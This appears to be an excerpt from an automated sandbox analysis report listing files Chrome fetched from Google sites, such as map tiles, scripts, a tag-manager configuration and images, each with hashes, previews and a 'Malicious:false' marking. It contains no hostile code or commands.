                                                                                                                                                                                                                                                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5894
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.942571738916282
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:B4Oseoml6hr7EXNUZ8OZIHyopZI7Td1+VtWL9H8TczIwWnb+GCI1DRfrn:B4OlAsGKHyopZidStfajI1DRT
                                                                                                                                                                                                                                                                                          MD5:73DBA3926222A563A16FA498867F1972
                                                                                                                                                                                                                                                                                          SHA1:CE55BB4B2E44B1EBA68F92250850541744437A4B
                                                                                                                                                                                                                                                                                          SHA-256:898675D45278864F40700EAC1E13883B3AF3D960727B0D4F1EE07156E016F6F2
                                                                                                                                                                                                                                                                                          SHA-512:1FA3CCFB5BE3A30BBC7DF5AE3845F25A67A1CCA663DCE5A43CCD1D9FC71363FADCBDC81F801ECA94899ECE6E39F125637CB3BA9F6168F3C7E1C39006633493A2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i2!3i5!4i256!2m3!1e0!2sm!3i707457593!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=122208
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?...&.$...K.)z...FRv......j..M..............*...u...G.H[..<.0.....&..t1.?.m...*S..6..N..Nz.S.RYz."..lr.h.u[...<-X.Z........e7.'t.f....h..#...A...v./..{..c.v......E...?.I2..^.~....d...!.H..$}.Ih.lJ.....Y...X.!.*n...e...^4..#I..4..?..qs..e..)..8..LR6..A.~.4.S.j.\..).x...:{.....:.X.C/S.D...gUm....[!4%.KH.wdU.MU..8.U.k[aPU;.L.....\.q....JA..Y.B...f..BS.G...XtU.+.En..e5d..N5.!l4$.!d..K...K....#......I.%.PL.I...l..^G2.p..........%..M*I...m....?.$....KR..A.,N..hI.+.eR.F.+.)..q...d.~.C...j.l..H..:.C4_}HD..K......\.M......:.!H........q.-)S...._'...L...!.L... .. ...j.}.k.L.k .8.l......}......[.M.t.0..+...VD./~j.6lg.akw..Jk.5.b`.I..@+..../l.DT....{..G.[7O..[o...R,.WBsu.R..ov.........G..y..W.......a.?.Y?..}.......0|.9...z...+...8O..v...pqyP....J......7.S....\..r/..!.B1..".0<.........</u...Dbm.o.e.H..%.#z......ZO|.^...K).O|]5.0...#..v.X..!y=[.{.5.\....a#.e.d.....DR|....^.X.K.\..9.S..Y.{..n.UgHbm..zP...\&q.V...g...G...?....<..sI....X'.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):183
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.225139620621421
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:JSmF+X/MKx8J8MLSHeoPAGQP3mDDUwKCJspoU1hvLWfLRat+2eFPKMLGRNL8BO8/:Y/MK6yMbo4j35wK/RhgLRat+2YyRiEmZ
                                                                                                                                                                                                                                                                                          MD5:6EA0864D3FDC90EDD1A6E71DBACF10D2
                                                                                                                                                                                                                                                                                          SHA1:88BCA6577741AC5BEA5E7B2C9F91C66BE2B9DDC1
                                                                                                                                                                                                                                                                                          SHA-256:04FA58465356AF4FF417565333A1FEE8CB7EB0EFD616AE4ADED9299F337DFB46
                                                                                                                                                                                                                                                                                          SHA-512:0CAC6D4FDED37F492A96A84FB8470CDD013187A6C8905DC3256BA42109F402963DEFFA3378E32C0477B27748A6E350220D7402D42FEF4BCB86BA25B103067AAC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/ianzD0dL.min.js
                                                                                                                                                                                                                                                                                          Preview:import{n as r}from"./IYoTYjYE.min.js";/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */function o(t){return r({...t,state:!0})}export{o as t};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1266)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1562
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2714430420096585
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:7llJkpDl3UAKkiB/+q1GilPHhW73iq/rXZCLS4QhTE4RuRZk/9SpeeSW:7+KhkoXAilPHiH/MLjYplSpeeSW
                                                                                                                                                                                                                                                                                          MD5:7708C11280060DC908A71D6F1451B021
                                                                                                                                                                                                                                                                                          SHA1:0081302F444120F14831E3A5440A7DF4DC4D4420
                                                                                                                                                                                                                                                                                          SHA-256:52D77BFFAE27B842362E9F8E0D1AB735DE85E28C8FF9B9F3F0104F6811DB2C4A
                                                                                                                                                                                                                                                                                          SHA-512:FAEF22A96095225AF63DE581BE63DC67F88D8475D1EA1787FDFCA328C386D095204FD00F18142AD09A5A4898B6AA32F3BBCFFE3664DBF575023A900B9581AF62
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as d,s as p,x as c}from"./ycaG4YXp.min.js";import{e as u}from"./0XPwTFcg.min.js";import{n as f}from"./IYoTYjYE.min.js";import{t as n}from"./ianzD0dL.min.js";import{i as b}from"./IFunn9hk.min.js";const g=":host{display:flex;height:auto;scroll-snap-align:var(--bds-carousel-scroll-snap-align);scroll-snap-type:x mandatory}.container{box-sizing:border-box;width:var(--bds-carousel-slide-width);min-width:var(--bds-carousel-slide-width)}";var v=Object.defineProperty,m=Object.getOwnPropertyDescriptor,a=(e,i,t,o)=>{for(var s=o>1?void 0:o?m(i,t):i,l=e.length-1,h;l>=0;l--)(h=e[l])&&(s=(o?h(i,t,s):h(s))||s);return o&&s&&v(i,t,s),s};let r=class extends p{constructor(){super(...arguments),this.role="listitem",this._width=0,this._height=0}get width(){return this.container?.offsetWidth}get height(){return this.container?.offsetHeight}attributeChangedCallback(e,i,t){if(super.attributeChangedCallback(e,i,t),e==="visible"){const o=t==="";this.updateVideoStates(o)}}updateVideoStates(e){this.queryS
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10341
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.971936202585003
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:XfkacKn221yb09Ga5N9bcsOOqlG4fSmMpVFCIN2zhKyQS6+JGZeBaZH:Xhd2xoV5/bzqlNfS56/Xv8eM5
                                                                                                                                                                                                                                                                                          MD5:E639FEDFEB77DCBC4A25E6AA7116353A
                                                                                                                                                                                                                                                                                          SHA1:96FC2BD806BF9B04D652EA329762967CC405076C
                                                                                                                                                                                                                                                                                          SHA-256:DF79FDAEADC0FA5E3FF483649B9FB45B607EE4E54EE79405B90A39BB0F80E020
                                                                                                                                                                                                                                                                                          SHA-512:908BA29C49F68E8DB7090B03107E08A4C1002A9586F1BEDAF41EC8C72E0A9E01622DF4E495BA673E6B388D49A12EE7F480183C699C9B8E7FF2274C0BDA93D2DD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..y.\Gu.n..jf$.$k.$..ly76x.....`.....y@ +<..^.I.K...cI.O.bC.C.Yb..&.xC...$[.e.....}.:.{o/3...3=.........nU..:uj.p.Gq.Gq.Gq.G.r.3....7..d.3.....#.FD.....9E.P..?.m.......#..N.g...^rA6.rp.............RQ...G.......I....,.....&..x.Cb........X..../.=e;..-...3G...\......YG.o.T:A.8.Y#F..)jC..u..V....@.." ..A..x......GDw....tf....^q.....G..m.g....b..,9..9Y...j...(.h.a..j%..Z.w#....1.I..L.....z..6.]...>(.'..x.{:[...yK...Wd.._x....K.t...S.c..E.RL..T....-...oU z.d2...O./........O...O.`~%]\<..~.....KV\."..R.t..x.Ki.......`....o.$.n</./.C...T...S{...KwM5..s....;/. .:n..F.Z....Wb-j.........Br....<...}...1j....y..._j........t.kL:..v.x2.?..F}j+...3.D.....&...$.M........Z{......uW......[(.X..}:.P.......B.8....L>?........Y....o.....#..7......'.Q./.G...6.NM..T..Z2..~`..n....<.s.w]y.1..n..._..:.T...B.#Bp.s%....=X:../..}..g.sxN.~...n*..k;~.1y-.<..9..'.9.w.....7....3..<'....A...../...4".r.Y..<.\...\.s
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):279952
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.613846983595824
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:TiJpmFU7Sli04d7G3BsEemve+N3H0fxnPk:WyW7S4nhios
                                                                                                                                                                                                                                                                                          MD5:A838D3FAF0CBAEEA42B245CA9B497FEC
                                                                                                                                                                                                                                                                                          SHA1:4FCC6C162F2F1AE639AFA0CE66A675A90F86E64E
                                                                                                                                                                                                                                                                                          SHA-256:9758521E254806598F1A1F58DACF17FACDD25FFC8464477DE0134DCAEE3462F5
                                                                                                                                                                                                                                                                                          SHA-512:0920794A02BF9DC44DF8A68DB21D9A0B2D026C9EBF89566BE5CE418C60ED0F2FB4A4544C49B5EF47987BEB95A9A67FA8874301138BCAF99B84FB774C61317561
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_auto_events","priority":18,"vtp_enableScroll":false,"vtp_enableOutboundClick":false,"vtp_enableDownload":false,"vtp_enableHistoryEvents":false,"vtp_enableForm":false,"vtp_enableVideo":false,"vtp_enablePageView":true,"tag_id":8},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isEnabled":false,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_S
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 789
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):450
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.4245184897347825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XPpJh5V6KXpcSnPosMRrcTLDrn7JXmB4Vv3t3:XPAWcSnPofRQrrnRmqVvF
                                                                                                                                                                                                                                                                                          MD5:666EEA998CA0E1C448124C744D6865AB
                                                                                                                                                                                                                                                                                          SHA1:604F4E21FCFCEC87012B0B1E5503ADB332C0F9E0
                                                                                                                                                                                                                                                                                          SHA-256:1E703F7D1D002C71C366C7BE44FE3780B8A76CF8F3D91B9817DF5475CBB713BD
                                                                                                                                                                                                                                                                                          SHA-512:9BCA60CC33932C85C05FB91CB7772EFCF77FE992FABA39DB871B43B20F643BF1499A5B909540713821A6ECF8D5EDD2E5455E33BEE6065486B016E951969BBDD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..........|R.n.0...+..%.j.!.5+ j...n{^.p.Z.F......c.(j3...7zof<..t....J.......j.l....W..Cy..s..hl.j.0!.h;.d....j*P.1P.4q..R...HS...a.E.8.1%J.Q..q..C.n.<...fY.y..W.,..1|...*........I..-....Y.8I.QR..`....=/E}8...ts..V..;7.-..n.)...E...?k^Y......<..R.h.....To.....H*.....D.,.~.g.._...g.U.a......"....Y.S...fopF..}.L...".%....<<...*.:..........v#..Z!....=8...{w..,.a[H..c>.l..-8.$.^.R........j...*3.].Y>.._.<j_......K,..........N.....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1174944
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983257392787344
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:Ej9gfq3LXQAGeKkCcuv9YcJ4ADTlWS3zUKGsBf5UL0T:Ej9gfqbXbMdcuvXdTlF3GWBuq
                                                                                                                                                                                                                                                                                          MD5:32F918890E5324465D07A34F8AADACD0
                                                                                                                                                                                                                                                                                          SHA1:EFEBA694109E57CBAAB8D8A9A6935843FE66B2D2
                                                                                                                                                                                                                                                                                          SHA-256:84AA9515CE1D401AC817ACD81AA256721DA8FEB6D61AC0D25156CE46180EF7AB
                                                                                                                                                                                                                                                                                          SHA-512:E5D18A2E627C2358AB8F3CFF5AF565256C8E4E2A2D83E8FE644C4188B6537DC6F64DB51FA5216D151C65CE12DD494CBD8FEE9FF8B4567631343B2820E8DFC9AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....sRGB.........eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 17:00:13......................................................2022:09:08 17:00:13..T.....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exif:ColorSpace>65535</exif:ColorSpace>. <
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 171 x 213, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):6327
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.917392761938663
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:fqjwqVtaVHyEy9BWc2AwJ+3qg1f6WUBIT8mIKPNc93Y8Nm:Yk3WBkAkg1CWUCwmIKS93O
                                                                                                                                                                                                                                                                                          MD5:4C9ACF280B47CEF7DEF3FC91A34C7FFE
                                                                                                                                                                                                                                                                                          SHA1:C32BB847DAF52117AB93B723D7C57D8B1E75D36B
                                                                                                                                                                                                                                                                                          SHA-256:5F9FC5B3FBDDF0E72C5C56CDCFC81C6E10C617D70B1B93FBE1E4679A8797BFF7
                                                                                                                                                                                                                                                                                          SHA-512:369D5888E0D19B46CB998EA166D421F98703AEC7D82A02DC7AE10409AEC253A7CE099D208500B4E39779526219301C66C2FD59FE92170B324E70CF63CE2B429C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/images/errors/robot.png
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...................WPLTE...z..z........2........W..{..V........z.....2..3.....V..2..................W.....>`......tRNS.............................Y..j....IDATx....BcI.@A.s..HX....k.0c...T.?n./.~....b....GM.Gu.c...?.{5.5...4.'.o<...i.O.n<.f..?).g.&..8.E4..tl.4.G.o4.....'.....\......._ ...../.~..<......../.~^.}...?...~...Z../.~.]._ ...I. .Q.Y....YQu..i..4.._ |S...A.-.-h...9...o...k.....9o..?N.U,../+...Z.y...nbMu....4O.7>..Y.-L=J..q..`.B^{4~.p...bR.j.....Gq=..]&..7Y)G6.....A.h`i]...Pd.'.7....9.2...2x.........&..a0N..By.Y.C.*.S......nR.-..A[5.....|.p...+v...d\e..]Yq;.&q0..F.c.....p3.&.`..!q..}...k.g5n#........NG-.9...C..[.7.n.v..u......{o.C&n!.(.G7.JA.'6..{(<....p....:..!=..1.f.."..n.8....~o..N.3l..p.[....*......r..6..z...(.g1qA.[....q.v+..&...B{.I.\..-.....S.y&.......J.Wn!|D.....+...y.....9.......> .j......{.....K\X.n!..e.I.+'...j...-pA.[..2...8g.DO.#.?p.. ....-.w5.d......4....n..!q..=..Gu.X..O.........sN.h.q..n!..qP
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 240x240, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5040
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9559327252264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:ZRG8iFZ7uyU8t6HtHOja0ImzV0I6I1rNUxS6c2kWbJf:Zs3U8UHtuW05sIRa/cLW
                                                                                                                                                                                                                                                                                          MD5:BB558876CB9C9A12D2C76A33729DF692
                                                                                                                                                                                                                                                                                          SHA1:B0C5E1A068D33A6E6FB4887D8BD8A0031B97E359
                                                                                                                                                                                                                                                                                          SHA-256:9212A2BE69C52B4B981A7176D08D0279388F03FCE1131F29EB562561CDB06717
                                                                                                                                                                                                                                                                                          SHA-512:38CD82EC71B020EDA1F9E4C9A8ECF0A9CE51179DCE847375BD488895C8A4577AAACCC0B09A7A0EF8BC1AB49C92B187904CEE12A358EC2F749AA5E49D1F46A1B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/DeWZgEYlH2q4TTbBRoog4uNnVRjqzWYmCj7_meS-_EZ_TSyWr22SIBeaCTsEAuu5U0QaubzYyJKyUzQmEqZQ5ZVAGHJrno0fKYEdZA=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .....\...*....>A .D..!.x},(......3u....?..S{m.?......k.sa...g.....}a.t.....*.k.....'s?0....^._..[.............S.c.O.[.S......io..`.F.z....>/.....]....'.m...........a.oX...k=..[.)...[...g....u..b...q.i..:...k..?b..}Q.&.....w.OsM..|.......C..........`...T6..|30.kU.-x.....Dk..../.!..QF..mM....,|;r..$^vm......:<.B..J...t..3..F...r.M..K..<{.I.pG.2K...J.....`.z....G[.t.....N.!....J.b.]9.(.w......$.,p.....vVEP7Y6.....DO.UP.9.9...........|...u..e.y.S|V....@............]..k`,.\.9Y%.....Y..D..........Nc~....G.,.o$......oNn</..q...,tZ..._}..z.._..3....a.C.}.h....F:.o...q.C......GP..k..J;R..._*S.W.t...N.G..V...u.?..]....c ...o.t/'....e..s..G...n..f.C.n../"...cANS.".A...B...<R*..Fo;..&..g.....o).E.?..y^...E.45...8@..N.Z|.Nq...l..S..k.e@...`.T....m3\..3..H....)!.I.Q..NV.#.lj.3.y.$.o..v......i8...EJ@....GEJY.P...Z....e...".P..z.aI....|.....E..e.Q..........._....])...4?.......)...-.....4.}......sT....P..#w.h.z.Q..1. C=..D.....4...Y....\....`....-gJ\..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9634
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.970882451285495
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:s5l+dmg48Smk2ajd2OjX4vFCaIB7xVXJPSShfEoXnEGS1:fdmnL2ajd2GXwZC7/BSSFEoXnEJ1
                                                                                                                                                                                                                                                                                          MD5:15975876928EB5BE40E85FC7739D6C8A
                                                                                                                                                                                                                                                                                          SHA1:9E985B9132FDACBCB8ADC5209BA66EC6E607E35C
                                                                                                                                                                                                                                                                                          SHA-256:71185299A1C6F47CF809BC15684AE61ABFC9768CD49D2ABBAA2E09FF14928E29
                                                                                                                                                                                                                                                                                          SHA-512:5EDEE2D2E56638BB5C32FFDA948893085DFC272CBD11AD9827EFF08788876C41CE6FA305795B935619F7992E7E3687C7AF7480ED143775E29FA42A7ED47DE205
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/6xlGJ-dkwosfUisVYzRKNE1Wcr5QDDfRfZ4bXktF-Nn0J0ucHd_JI1wjXTls7lt5mvJvvcvtrNc0MESF98dAx6ivasEsZNxoaUZU-Q=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx..y.\U..?..[U.d.w..A.C..$......C....qx.q.U..e{...dT..Qq.....}......A.L..E......K.kuwuW.....q../]..'?."....w....s.-8L..0...t.... q...i......M."..a....I/..V. .v@.....~.-B.7c...V..V....-..Z1&.`!..2..S...v`....r../....4.........[.R...;.x...s.L..3S.T0..C4.0`..B..D.2.@$..Xl..zT..F,./.....y.....N@...HO....).....V.....Tn*G.B.1.....AoiE..B......C.y_._...........r.r\.j.:.7..s..(f"E..PB...".\.J.)....hD.l..s.m.2...;../}......:$...S.R_...$fr..."...`j..D..mGu.1.5..h..5..9k..B.....gk....!.p.M.m.S.;.D.(54.....RM...W.8Z&.j...`!...EK.g....T....!.p.-.^o2....c......+..LS.t.:J.eau,....H....K.A....7t.....3..}.E).HQ.5KM7.p.2.Z.`-^.5{......._...:#3C......;.......8...F.8.S)D<..h..9.w}.[.Vg..t....S'.L.....R=1.Hl..M.......z.Z#g.!.xI.hi...+..mu..GU.]s....F./e..Z.''@Z."n@.j.G!....)2.v,..._....i.oUX8..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):10341
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.971936202585003
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:XfkacKn221yb09Ga5N9bcsOOqlG4fSmMpVFCIN2zhKyQS6+JGZeBaZH:Xhd2xoV5/bzqlNfS56/Xv8eM5
                                                                                                                                                                                                                                                                                          MD5:E639FEDFEB77DCBC4A25E6AA7116353A
                                                                                                                                                                                                                                                                                          SHA1:96FC2BD806BF9B04D652EA329762967CC405076C
                                                                                                                                                                                                                                                                                          SHA-256:DF79FDAEADC0FA5E3FF483649B9FB45B607EE4E54EE79405B90A39BB0F80E020
                                                                                                                                                                                                                                                                                          SHA-512:908BA29C49F68E8DB7090B03107E08A4C1002A9586F1BEDAF41EC8C72E0A9E01622DF4E495BA673E6B388D49A12EE7F480183C699C9B8E7FF2274C0BDA93D2DD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/7hNVq4eXYDqKikz_x6QUIN1x3ArrF3IzcaNWS6TQpna79BIWfNfnRviifT6hBugE7mYpKpiM7Ps7YN5XkGFmXaTyTKjiYsUoNquxGvQ=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..y.\Gu.n..jf$.$k.$..ly76x.....`.....y@ +<..^.I.K...cI.O.bC.C.Yb..&.xC...$[.e.....}.:.{o/3...3=.........nU..:uj.p.Gq.Gq.Gq.G.r.3....7..d.3.....#.FD.....9E.P..?.m.......#..N.g...^rA6.rp.............RQ...G.......I....,.....&..x.Cb........X..../.=e;..-...3G...\......YG.o.T:A.8.Y#F..)jC..u..V....@.." ..A..x......GDw....tf....^q.....G..m.g....b..,9..9Y...j...(.h.a..j%..Z.w#....1.I..L.....z..6.]...>(.'..x.{:[...yK...Wd.._x....K.t...S.c..E.RL..T....-...oU z.d2...O./........O...O.`~%]\<..~.....KV\."..R.t..x.Ki.......`....o.$.n</./.C...T...S{...KwM5..s....;/. .:n..F.Z....Wb-j.........Br....<...}...1j....y..._j........t.kL:..v.x2.?..F}j+...3.D.....&...$.M........Z{......uW......[(.X..}:.P.......B.8....L>?........Y....o.....#..7......'.Q./.G...6.NM..T..Z2..~`..n....<.s.w]y.1..n..._..:.T...B.#Bp.s%....=X:../..}..g.sxN.~...n*..k;~.1y-.<..9..'.9.w.....7....3..<'....A...../...4".r.Y..<.\...\.s
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (24268)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):24269
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.313087304221335
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:ASiEQN82UCnB9XV6pFSICrk7rdSkd9DdOeuuB:OBux7rX9DdOeuuB
                                                                                                                                                                                                                                                                                          MD5:350F7072DBEE327C4A7E028F1AF861B2
                                                                                                                                                                                                                                                                                          SHA1:00D809A5C09674A4230237ED861A7464A080F118
                                                                                                                                                                                                                                                                                          SHA-256:932689923C96592B586AE9F412AA693615CEA040FD55559BE9E174A36B5D326C
